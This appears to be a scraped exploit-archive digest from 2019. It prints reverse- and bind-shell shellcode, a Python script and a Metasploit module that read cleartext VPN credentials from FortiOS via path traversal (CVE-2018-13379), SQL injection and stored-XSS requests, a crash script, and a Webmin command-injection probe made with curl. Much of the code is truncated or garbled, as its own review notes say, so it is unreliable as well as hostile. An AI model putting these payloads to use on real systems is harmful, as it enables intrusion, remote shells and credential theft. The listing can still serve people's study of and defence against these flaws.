157 bytes small Linux/MIPS64 reverse (localhost:4444/TCP) shell shellcode.

MD5 | 943dc4bcee3d0b33275bf2fdf8a0cb86

* # Reverse shell shellcode for Linux MIPS64 (mips64el)
* # Default port: tcp/4444
* # Host: localhost
* # Date: August 19 - 2019
* # Author: Antonio de la Piedra
* # Tested on: MIPS Malta - Linux debian-mips64el 4.9.0-3-5kc-malta
* # Size: 157 bytes
* # Compile with: gcc -fno-stack-protector -z execstack main.c -o main -g


# Review notes: this is an extraction of the published listing and is not
# assemble-able as shown -- `__start` is declared global but never defined
# as a label, and `bne ... loop` below targets a `loop` label that does not
# appear here. Syscall numbers are MIPS n64 (5000-based): 5040 socket,
# 5041 connect, 5032 dup2, 5057 execve. The non-zero `syscall 0x40404` code
# field is ignored by the kernel; presumably it is there to avoid null bytes.
# Indicators visible in the constants: port 0x5c11 (htons(4444)), address
# 0x0101017f (127.1.1.1 when stored little-endian -- still loopback) and the
# "//bin/sh" string bytes 0x69622f2f / 0x68732f6e.
.global __start

dli $s4, -3                     # ~(-3) == 2, produced via nor below (AF_INET / SOCK_STREAM)
dli $s5, -17                    # ~(-17) == 16 == sizeof(struct sockaddr_in)
nor $a0,$s4,$zero               # a0 = 2 (AF_INET)
nor $a1,$s4,$zero               # a1 = 2 (SOCK_STREAM)
slti $a2,$zero,-1               # a2 = 0 (protocol) without a literal zero
li $v0,5040                     # socket(a0, a1, a2)
syscall 0x40404

sw $v0, -32($sp)                # stash the socket fd
lw $a0, -32($sp)                # a0 = fd for the following calls

nor $t0,$s4,$zero               # t0 = 2 (sin_family = AF_INET)
sw $t0, -12($sp)                # sockaddr_in starts at sp-12
dli $t2,0x5c11                  # sin_port = htons(4444)
sw $t2,-10($sp)                 # 4-byte store to sp-10 is unaligned; relies on kernel fix-up (TODO confirm on target)
dli $t1,0x0101017f              # sin_addr = 127.1.1.1 (little-endian bytes 7f 01 01 01)
sw $t1,-8($sp)                  # also re-zeroes the two bytes above sin_port
daddiu $a1,$sp,-12              # a1 = &sockaddr_in
nor $a2,$s5,$zero               # a2 = 16 (addrlen)
dli $v0,5041                    # connect(fd, &addr, 16)
syscall 0x40404

nor $a1,$s4,$zero               # a1 = 2: dup2 counts 2,1,0 onto the socket fd
dli $s0, -1                     # loop sentinel
dli $v0,5032                    # dup2(fd, a1); v0 must be reloaded each pass (syscall overwrites it)
syscall 0x40404
daddi $a1,$a1,-1
bne $a1,$s0,loop                # `loop` label is missing from this listing (presumably at the dli $v0 above)
dli $t0,0x69622f2f              # "//bi"
sw $t0,-12($sp)
dli $t1,0x68732f6e              # "n/sh"
dli $t1,0x68732f6e              # duplicated line; harmless
sw $t1,-8($sp)
sw $zero,-4($sp)                # NUL terminator -> "//bin/sh"
daddiu $a0,$sp,-12              # a0 = path
slti $a1,$zero,-1               # a1 = 0 (argv)
slti $a2,$zero,-1               # a2 = 0 (envp)
dli $v0,5057                    # execve(path, 0, 0)
syscall 0x40404
.align 8

unsigned char code[] =

int main(int argc, char ** argv)

printf("Shellcode Length: %dn", strlen(code));

s = code;



129 bytes small Linux/x86_64 bind (4444/TCP) shell (/bin/sh) + password (pass) shellcode.

MD5 | 4f69a9a7b34a1231bc105cb3374d328e

; Title : Linux/x86_64 - Bind Shell (/bin/sh) with Password (configurable) (129 bytes)
; Date : 2019-08-18
; Author : Gonçalo Ribeiro (@goncalor)
; Website : goncalor.com
; SLAE64-ID : 1635

; Review notes: this is an extraction of the published 129-byte listing and
; is not assemble-able as shown -- the labels real_start, dup2_loop and exit
; are referenced but never defined, and no `syscall` instruction survives
; after any of the register set-ups below. Indicators visible in the
; constants: listening port 0x5c11 (htons(4444)), the "/bin//sh" qword
; 0x68732f2f6e69622f, and the clear-text password bytes stored right after
; the entry jump.
global _start

%define pass "pass"
%define port 0x5c11 ; htons(4444)

jmp real_start ; real_start is not defined in this listing
password: db pass ; password lives in clear text inside the payload
pass_len: db $-password

; sock = socket(AF_INET, SOCK_STREAM, 0)
; AF_INET = 2
; __NR_socket = 41
; On success, a file descriptor for the new socket is returned

push 41
pop rax
push 2
pop rdi ; rdi = AF_INET
push 1
pop rsi ; rsi = SOCK_STREAM
cdq ; copies rax's bit 31 to all bits of edx (zeroes rdx)

push rax
pop rdi ; rdi = sock (assumes the socket() syscall ran just before -- missing here)

; server.sin_family = AF_INET; short
; server.sin_port = htons(4444); unsigned short
; server.sin_addr.s_addr = INADDR_ANY; unsigned long
; bzero(&server.sin_zero, 8);
; https://beej.us/guide/bgnet/html/multi/sockaddr_inman.html
; struct sockaddr_in {
; short sin_family;
; unsigned short sin_port;
; struct in_addr sin_addr;
; char sin_zero[8];
; };
; bind(sock, (struct sockaddr *)&server, sockaddr_len)
; AF_INET = 2
; __NR_bind = 49
; On success, zero is returned

xor eax, eax ; shorter and will still zero the upper bytes
push rax ; sin_zero
push ax
push ax ; sin_addr
push word port
push word 2

; bind
add al, 49
push rsp
pop rsi ; rsi = &server (struct built on the stack above)
add dl, 16 ; sizeof(sockaddr_in)

; listen(sock, 2)
; __NR_listen = 50
; On success, zero is returned

mov al, 50
xor esi, esi
mov sil, 2

; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len)
; __NR_accept = 43
; On success, a file descriptor is returned

mov al, 43
xor esi, esi
;xor rdx, rdx ; already zeroed
; NOTE(review): rdx still holds 16 from bind() here, not zero; presumably
; harmless because accept() only reads addrlen when addr (rsi) is non-NULL.

push rax ; save "new"

; close(sock)
; __NR_close = 3
; returns zero on success

; closing is not strictly necessary
;mov al, 3

; dup2(new, 0);
; dup2(new, 1);
; dup2(new, 2);
; __NR_dup2 = 33
; On success, return the new file descriptor

pop rdi ; "new" was pushed in accept()
push 2
pop rsi

mov al, 33
dec esi
jns dup2_loop ; dup2_loop is not defined in this listing

; read(int fd, void *buf, size_t count)
; On success, the number of bytes read is returned

;xor eax, eax ; already done by dup2
;rdi = "new" ; already done in dup2
push rax
push rax ; create space for "buf" in the stack
push rsp
pop rsi ; rsi = *buf
mov dl, 16

xor ecx, ecx
lea rdi, [rel pass_len]
mov cl, [rdi] ; rcx = strlen(pass)
sub rdi, rcx ; rdi = &password
repz cmpsb ; prefix comparison: only the first pass_len bytes of the 16-byte buffer are checked
jne exit ; exit is not defined in this listing

; execve(const char *path, char *const argv[], char *const envp[])
; rdi, path = (char*) /bin//sh, 0x00 (double slash for padding)
; rsi, argv = (char**) (/bin//sh, 0x00)
; rdx, envp = &0x00

xor eax, eax
push rax
push rsp
pop rdx ; *rdx = &0x00

mov rsi, 0x68732f2f6e69622f ; rax2 -S $(echo /bin//sh | rev)
push rsi
push rsp
pop rdi ; rdi = (char*) /bin//sh

push rax
push rdi
push rsp
pop rsi ; rsi = (char**) (/bin//sh, 0x00)

mov al, 59 ; __NR_execve; the syscall instruction is missing here

;xor eax, eax ; upper bytes are zero after read
mov al, 60 ; __NR_exit; the syscall instruction is missing here


char code[] =

int main() {
printf("length: %lun", strlen(code));
((int(*)()) code)();


FortiOS versions 5.6.3 through 5.6.7 and 6.0.0 through 6.0.4 suffer from a credential disclosure vulnerability.

MD5 | a022f0e2fde0c635d9836c8aef10e213

# Exploit Title: FortiOS Leak file - Reading login/passwords in clear text.
# Google Dork: intext:"Please Login" inurl:"/remote/login"
# Date: 17/08/2019
# Exploit Author: Carlos E. Vieira
# Vendor Homepage: https://www.fortinet.com/
# Software Link: https://www.fortinet.com/products/fortigate/fortios.html
# Version: This vulnerability affects FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4.
# Tested on: 5.6.6
# CVE : CVE-2018-13379

# Exploit SSLVPN Fortinet - FortiOs
#!/usr/bin/env python
import requests, sys, time
import urllib3

def leak(host, port):
# Fetches the traversal URI over HTTPS (certificate verification disabled)
# and, when the response carries the "var fgt_lang =" marker, stores it as
# "sslvpn_websession_<host>.dat" for parse() to read later.
# NOTE(review): not runnable as extracted -- `img` is never assigned
# (presumably a read of the response body was dropped), the opened file is
# never written, and the `except` has no matching `try:`; indentation is
# also lost, so the control flow below is only indicative.
print("[!] Leak information...")
url = "https://"+host+":"+port+"/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
headers = {"User-Agent": "Mozilla/5.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
r=requests.get(url, headers=headers, verify=False, stream=True)
if "var fgt_lang =" in str(img):
with open("sslvpn_websession_"+host+".dat", 'w') as f:
print("[>] Save to file ....")
return True
return False
except requests.exceptions.ConnectionError:
return False
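def is_character_printable(s):
    """Return True when every character of ``s`` is printable ASCII (0x20-0x7E).

    The extracted listing read ``(ord(c) = 32)``: the ``<= 126 and ord(c) >``
    in the middle of the condition was swallowed as if it were an HTML tag,
    leaving a syntax error. The original range check is restored here.
    An empty ``s`` is vacuously printable, as in the original ``all()``.
    """
    return all(32 <= ord(c) <= 126 for c in s)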

def is_printable(byte):
    """Map one character to itself when printable ASCII, otherwise to ``'.'``."""
    placeholder = '.'
    if not is_character_printable(byte):
        return placeholder
    return byte

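def read_bytes(host, chunksize=8192):
    """Yield the saved capture for ``host`` one item at a time.

    Reads ``sslvpn_websession_<host>.dat`` from the current directory in
    ``chunksize`` blocks. Iterating ``bytes`` yields ``int`` under Python 3
    and one-character ``str`` under Python 2; this generator does not
    convert.

    Fixes: the original ``while True`` never ended -- an empty chunk at EOF
    was merely skipped, so the loop spun forever -- and the progress message
    named ``sslvpn_websession<host>.dat`` while the file actually opened has
    an underscore before the host.
    """
    filename = "sslvpn_websession_" + host + ".dat"
    print("[>] Read bytes from > " + filename)
    with open(filename, "rb") as f:
        while True:
            chunk = f.read(chunksize)
            if not chunk:  # EOF (or chunksize <= 0): stop instead of looping forever
                break
            for b in chunk:
                yield b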
def parse(host):
    """Print the saved capture for ``host`` as 61-character text rows.

    Each item from ``read_bytes`` is mapped through ``is_printable`` (non
    printable -> ``'.'``); a row made only of dots (pure binary) is dropped so
    embedded strings stand out. A trailing partial row is discarded.
    """
    print("[!] Parsing Information...")
    ROW_WIDTH = 61
    dots_only = "." * ROW_WIDTH
    row = ""
    for offset, raw in enumerate(read_bytes(host)):
        row += is_printable(raw)
        if offset % ROW_WIDTH == ROW_WIDTH - 1:
            if row != dots_only:
                print(row)
            row = ""

def check(host, port):
# Requests the traversal URI (certificate verification disabled) and reports
# "vulnerable" on HTTP 200 alone; unlike leak(), the body is not inspected
# for the "var fgt_lang =" marker, so any handler answering 200 for this
# path counts as a hit.
# NOTE(review): indentation was lost in extraction; the `elif` branch and the
# two trailing `return False` lines are redundant with each other either way.
# No request timeout is set, so an unresponsive host blocks indefinitely.
print("[!] Check vuln...")
uri = "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
r = requests.get("https://" + host + ":" + port + uri, verify=False)
if(r.status_code == 200):
return True
elif(r.status_code == 404):
return False
return False
return False
def main(host, port):
# Runs check() and then leak(). NOTE(review): as extracted the branching is
# flattened -- the `if vuln:` / `else:` lines are missing, so both the
# "vulnerable" and "not vulnerable" messages print unconditionally. parse()
# is defined above but nothing that survives here calls it; `bin_file` is
# assigned and never used.
print("[+] Start exploiting....")
vuln = check(host, port)
print("[+] Target is vulnerable!")
bin_file = leak(host, port)
print("[X] Target not vulnerable.")

if __name__ == "__main__":

# NOTE(review): the usage message is printed but the script does not stop
# (a `sys.exit()` appears to have been lost in extraction), so with fewer
# than two arguments the `sys.argv[1]` access below raises IndexError.
# Indentation of this block was also lost.
if(len(sys.argv) < 3):
print("Use: python {} ip/dns port".format(sys.argv[0]))
host = sys.argv[1]
port = sys.argv[2]
main(host, port)


This Metasploit module exploits FortiOS versions 5.6.3 through 5.6.7 and 6.0.0 through 6.0.4 to leverage a credential disclosure vulnerability by reading the /dev/cmdb/sslvpn_websession file.

MD5 | 956f30465640700e922f5cf3e4a9bdf6

# Exploit Title: FortiOS Leak file - Reading login/passwords in clear text.
# Google Dork: intext:"Please Login" inurl:"/remote/login"
# Date: 17/08/2019
# Exploit Author: Carlos E. Vieira
# Vendor Homepage: https://www.fortinet.com/
# Software Link: https://www.fortinet.com/products/fortigate/fortios.html
# Version: This vulnerability affects FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4.
# Tested on: 5.6.6
# CVE : CVE-2018-13379

require 'msf/core'
class MetasploitModule < Msf::Auxiliary
# Review notes: this listing is an incomplete extraction -- `initialize`
# lacks the `super(update_info(info, ...))` wrapper and hash closers, and
# every `end` (methods, `if` / `while` / `for` bodies, the class itself) is
# missing, so the module cannot be loaded as shown. `parse` is defined but
# nothing that survives here calls it.
include Msf::Exploit::Remote::HttpClient
include Msf::Post::File
# Module metadata; defaults target the SSL-VPN portal over HTTPS (RPORT 443, SSL on).
def initialize(info = {})
'Name' => 'SSL VPN FortiOs - System file leak',
'Description' => %q{
FortiOS system file leak through SSL VPN via specially crafted HTTP resource requests.
This exploit read /dev/cmdb/sslvpn_websession file, this file contains login and passwords in (clear/text).
This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ).
'References' =>
[ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379' ]
'Author' => [ 'lynx (Carlos Vieira)' ],
'License' => MSF_LICENSE,
'DefaultOptions' =>
'RPORT' => 443,
'SSL' => true


# Sends the traversal request once. An HTTP 200 alone is taken as
# "vulnerable" (the body is not validated) and the raw body is written to
# "msf_sslwebsession_<RHOST>.bin" in the working directory, replacing any
# earlier capture. A 404 is reported as not vulnerable; any other outcome
# falls to the "try again" message.
def run()
print_good("Checking target...")
res = send_request_raw({'uri'=>'/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession'})

if res && res.code == 200
print_good("Target is Vulnerable!")
data = res.body
current_host = datastore['RHOST']
filename = "msf_sslwebsession_"+current_host+".bin"
File.delete(filename) if File.exist?(filename)
file_local_write(filename, data)
print_good("Parsing binary file.......")
if(res && res.code == 404)
print_error("Target not Vulnerable")
print_error("Ow crap, try again...")
# Renders the saved capture as printable rows of up to 60 characters
# (non-printable bytes become '.'), dropping rows that are all dots.
# The loop bodies are cut off below; `words` is assigned but unused here,
# and the File object opened with File.new is never closed in what survives.
def parse()
current_host = datastore['RHOST']

fileObj = File.new("msf_sslwebsession_"+current_host+".bin", "r")
words = 0
while (line = fileObj.gets)
printable_data = line.gsub(/[^[:print:]]/, '.')
array_data = printable_data.scan(/.{1,60}/m)
for ar in array_data
if ar != "............................................................"



YouPHPTube version 7.2 suffers from a remote SQL injection vulnerability in userCreate.json.php.

MD5 | 0c5a7e8e6f6f45c7826e5a19a22f0dea

# Exploit Title: YouPHPTube < 7.3 SQL Injection
# Google Dork: /
# Date: 19.08.2019
# Exploit Author: Fabian Mosch, r-tec IT Security GmbH
# Vendor Homepage: https://www.youphptube.com/
# Software Link: https://github.com/YouPHPTube/YouPHPTube
# Version: < 7.3
# Tested on: Linux/Windows
# CVE : CVE-2019-14430

The parameters "User" and "pass" of the user registration function are vulnerable to SQL injection. By submitting an HTTP POST request to "/objects/userCreate.json.php", an attacker can query the database and, for example, read an administrator's hashed credentials.

Example Request:

POST /objects/userCreate.json.php HTTP/1.1
Host: vulnerablehost.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
[SomeHeaders and Cookies]

user=tes'INJECTHERE&pass=test'INJECTHERE &email=test%40example.com&name=test&captcha=xxxxx

Methods for DB-Extraction are:

- Boolean-based blind

- Error-based

- AND/OR time-based blind

The vulnerability was fixed with this commit:


The Mandos system allows computers to have encrypted root file systems and at the same time be capable of remote or unattended reboots. The computers run a small client program in the initial RAM disk environment which will communicate with a server over a network. All network communication is encrypted using TLS. The clients are identified by the server using an OpenPGP key that is unique to each client. The server sends the clients an encrypted password. The encrypted password is decrypted by the clients using the same OpenPGP key, and the password is then used to unlock the root file system.

MD5 | dc129218c58f33b7c68e4cb7a34ecd6a


Neo Billing version 3.5 suffers from a persistent cross site scripting vulnerability.

MD5 | 7d47b4f46e7a051cb9a4041134f8126a

# Exploit Title: Neo Billing 3.5 - Stored Cross Site Scripting Vulnerability
# Date: 18.8.2019.
# Exploit Author: n1x_ [MS-WEB]
# Vendor Homepage: https://codecanyon.net/item/neo-billing-accounting-invoicing-and-crm-software/20896547
# Version: 3.5
# CWE : CWE-79


# Neo Billing is an accounting, invoicing and CRM PHP script, with over 500 installations.
# Due to improper filtering of input field data, version 3.5 (and possibly previous versions) is affected by a stored XSS vulnerability.

[Proof of Concept]

# 1. Authorization as customer (regular user account) [//host/neo/crm/user/login]
# 2. Closing an input field tag and injecting code into 'Subject' or 'Description' text fields [//host/neo/crm/tickets/addticket]
# 3. The code is stored [//host/neo/crm/tickets] or [//host/neo/crm/tickets/thread/?id=ticketid]

[Example payloads]

# Example payload: ">
# Example payload: ">alert(document.cookie)

[POST Request]

POST /neo/crm/tickets/addticket HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: //host/neo/crm/tickets/addticket
Content-Type: multipart/form-data; boundary=---------------------------899768029113033755249127523
Content-Length: 694
Cookie: __cfduid=d99e93624fe63d5aa953bf59cd28cdafe1566123585; ci_sessions=nel35vfb2hi5f9tt29l43ogn36hdmilj
Connection: close
Upgrade-Insecure-Requests: 1

Content-Disposition: form-data; name="title"

Content-Disposition: form-data; name="content"


Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream

Content-Disposition: form-data; name="userfile"; filename=""
Content-Type: application/octet-stream



Kimai version 2 suffers from a persistent cross site scripting vulnerability.

MD5 | d467918811040b33c88487e63e4fa7b0

# Exploit Title: Kimai 2 - Persistent Cross-Site Scripting (XSS)
# Date: 07/15/2019
# Exploit Author: osamaalaa
# Vendor Homepage: [link]
# Software Link: https://github.com/kevinpapst/kimai2
# Fixed on Github : https://github.com/kevinpapst/kimai2/pull/962
# Version: 2

1. A normal user adds a timesheet from this link: http://localhost/index.php/en/timesheet/create

2-Add this payload "> in the description

3-Save The changes

4. Refresh the page and the alert pops up.

Request PoC:

POST /index.php/en/timesheet/create HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 392
Connection: close
Referer: http://localhost
Cookie: PHPSESSID=auehoprhqk3qspncs5s08ucobv

timesheet_edit_form[begin]=2019-08-17 13:02&timesheet_edit_form[end]=2019-08-18 00:00&timesheet_edit_form[customer]=12&timesheet_edit_form[project]=24&timesheet_edit_form[activity]=27&timesheet_edit_form[description]= ">&timesheet_edit_form[tags]=&timesheet_edit_form[_token]=19Owg2YgIMPFUcEP9NVibhqEpKwkwhVt5j-BTJysyK0


RAR Password Recovery version 1.80 suffers from a user name and registration code denial of service vulnerability.

MD5 | c8006c83d8c82155250a442fd9ef4c2b

# Exploit Title: RAR Password Recovery v1.80 Denial of Service Exploit
# Date: 16.08.2019
# Vendor Homepage:https://www.top-password.com/
# Software Link: https://www.top-password.com/download/RARPRSetup.exe
# Exploit Author: Achilles
# Tested Version: v1.80
# Tested on: Windows 7 x64
# Windows XP SP3

# 1.- Run python code :RAR Password Recovery.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open RAR Password Recovery and Click 'Register'
# 4.- Paste the content of EVIL.txt into the Field: 'User Name and Registration Code'
# 5.- Click 'OK' and you will see a crash.

#!/usr/bin/env python
# Review notes: extracted listing -- the file-writing step (the open/write
# around the status messages below, presumably inside a try/except) was
# lost, so the three prints run unconditionally and no EVIL.txt is produced.
# "x41" is a garbled "\x41" escape: as shown, `buffer` is 18000 bytes of the
# text "x41" rather than 6000 bytes of 0x41. Python 2 print syntax.
buffer = "x41" * 6000

print "[+] Creating %s bytes evil payload.." %len(buffer)
print "[+] File created!"
print "File cannot be created"


Webmin unauthenticated remote command execution exploit that identifies whether or not a target is vulnerable.

MD5 | d3f8ab6c772881a15aae824b15be9760

# CVE-2019-15107 Webmin Unauthenticated Remote Command Execution
# based on Metasploit module https://www.exploit-db.com/exploits/47230
# Original advisory: https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
# Alternative advisory (spanish): https://blog.nivel4.com/noticias/vulnerabilidad-de-ejecucion-de-comandos-remotos-en-webmin
# Fernando A. Lagos B. (Zerial)
# https://blog.zerial.org
# https://blog.nivel4.com
# The script sends a flag via an echo command and then greps the response for it. If it matches, the target is vulnerable.
# Usage: sh CVE-2019-15107.sh https://target:port
# Example: sh CVE-2019-15107.sh https://localhost:10000
# output: Testing for RCE (CVE-2019-15107) on https://localhost:10000: VULNERABLE!


# Review notes: extracted listing -- the assignments of URI (from $1, per the
# usage line above) and FLAG are missing, and the `if` below has lost its
# `then` / `else` / `fi`, so the script cannot run as shown. '33[0;31m' and
# '33[0;32m' are garbled '\033[...]' colour escapes. $URI and $FLAG are
# expanded unquoted; `echo -n` is not portable across /bin/sh implementations.
echo -n "Testing for RCE (CVE-2019-15107) on $URI: ";
# Single probe of password_change.cgi; the exit status of grep decides the verdict.
curl -ks $URI'/password_change.cgi' -d 'user=wheel&pam=&expired=2&old=id|echo '$FLAG'&new1=wheel&new2=wheel' -H 'Cookie: redirect=1; testing=1; sid=x; sessiontest=1;' -H "Content-Type: application/x-www-form-urlencoded" -H 'Referer: '$URI'/session_login.cgi'|grep $FLAG>/dev/null 2>&1

if [ $? -eq 0 ];
echo '33[0;31mVULNERABLE!33[0m'
echo '33[0;32mOK! (target is not vulnerable)33[0m'